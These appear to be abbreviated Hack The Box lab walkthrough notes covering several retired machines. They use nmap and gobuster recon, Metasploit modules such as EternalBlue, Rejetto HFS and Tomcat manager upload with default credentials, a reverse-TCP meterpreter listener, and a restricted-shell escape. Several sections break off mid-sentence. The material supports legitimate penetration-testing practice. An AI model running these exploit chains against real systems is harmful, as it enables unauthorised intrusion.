HTB Optimum

$nmap -A -sV -p-
$nikto -h
$searchsploit hfs
$cat /usr/share/exploitdb/exploits/windows/remote/346
msf5 > search hfs
msf5 > use 1
msf5 exploit(windows/http/rejetto_hfs_exec) > options
msf5 exploit(windows/http/rejetto_hfs_exec) > set rhost
msf5 exploit(windows/http/rejetto_hfs_exec) > run
meterpreter > ls
meterpreter > cat user.txt.txt
meterpreter > getuid
meterpreter > sysinfo
Sysinfo shows that we are on a Windows Server 2012 R2 host with a 64-bit (x64) architecture. Due to the fact that the default reverse_tcp

HTB Blue

$nmap -A -T4 -p- -sV
Result analysis:
135: windows rpc
139: smb
445: smb
OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
$nmap -p 445 --script vuln
msf5 > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > options
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
C:\Windows\system32>whoami
C:\Users>dir
C:\Users>cd haris
C:\Users\haris>cd Desktop
C:\Users\haris\Desktop>dir
C:\Users\haris\Desktop>type user.txt
C:\Users>cd Administrator
C:\Users\Administrator>cd Desktop
C:\Users\Administrator\Desktop>dir
C:\Users\Administrator\Desktop>type root.txt

HTB Jerry

$nmap -A -T4 -p- -sV -Pn
$gobuster dir -u -w /usr/share/wordlists/dirb/common.txt -e
$nikto -h
Access to
Use the credentials found in Nikto's results (tomcat/s3cret).
As we can observe, we are able to upload and deploy a WAR file.
msf5 > use exploit/multi/http/tomcat_mgr_upload
msf5 exploit(multi/http/tomcat_mgr_upload) > options
msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpPassword s3cret
msf5 exploit(multi/http/tomcat_mgr_upload) > set HttpUsername tomcat
msf5 exploit(multi/http/tomcat_mgr_upload) > set rhost
msf5 exploit(multi/http/tomcat_mgr_upload) > set

Create a Metasploit listener

Steps to create a Metasploit listener:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost
msf5 exploit(multi/handler) > set lport 9999
msf5 exploit(multi/handler) > set ExitOnSession false
msf5 exploit(multi/handler) > exploit -j
msf5 exploit(multi/handler) > sessions -i 1

(Solution) – Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable

Using Metasploit, I've sometimes seen this error:
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (
To solve it:
List the processes listening on port 1234:
lsof -i :1234
Kill the process with process ID 5678:
kill -9 5678

HTB Devel

$nmap -T4 -sV -p- -A
Open ports detected:
21/tcp open  ftp     Microsoft ftpd
80/tcp open  http    Microsoft IIS httpd 7.5
$nikto -h
$nmap -p 80 --script vuln
$nmap -p 21 --script vuln
$gobuster dir -u -w /usr/share/wordlists/dirb/common.txt
Nothing much useful was found until this point.
$ftp
ftp> dir
ftp> put test.txt
ftp> dir
So, if we can upload any file, can we

HTB Legacy

$sudo nmap -A -T4 -p-
Open ports detected:
139/tcp open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Based on the detected ports, we have SMB here.
$ msfconsole
msf5 > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > options
msf5 auxiliary(scanner/smb/smb_version) > run
Which SMB version do we have? Not sure yet…
$nmap -p139 --script smb-protocols -Pn
$nmap -p445 --script smb-protocols -Pn
According to

HTB Lame

$nmap -T4 -p- -A -Pn
Open ports detected:
21/tcp   open  ftp          vsftpd 2.3.4
22/tcp   open  ssh          OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp  open  netbios-ssn  Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn  Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd      distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
$ftp
No files are detected.
$ssh
$msfconsole
Install Searchsploit:
$sudo apt update && sudo apt -y install exploitdb
$searchsploit

HTB Starting Point – Base

$./
Ports detected:
22/tcp open  ssh   OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http  Apache httpd 2.4.29 ((Ubuntu))
$gobuster dir -u -w /usr/share/wordlists/dirb/big.txt
Interesting items found: /_uploaded and /login
Access to
The login folder can be listed (due to a misconfiguration of the web server).
Foothold
Download all three files to analyze them. login.php.swp is a binary file.
$ls -la
$file login.php.swp
As it is described, login.php.swp

HTB Starting Point – Guard

$./
The SSH port is open. Let's try the last SSH user we obtained.
$ssh -i id_rsa daniel@
The SSH login gives us access to a restricted shell, where commands like find, cat and python are disabled. We are unable to read user.txt from this shell. The man command can be used to spawn a bash shell. Once the command opens the manual, we can enter the following command to spawn a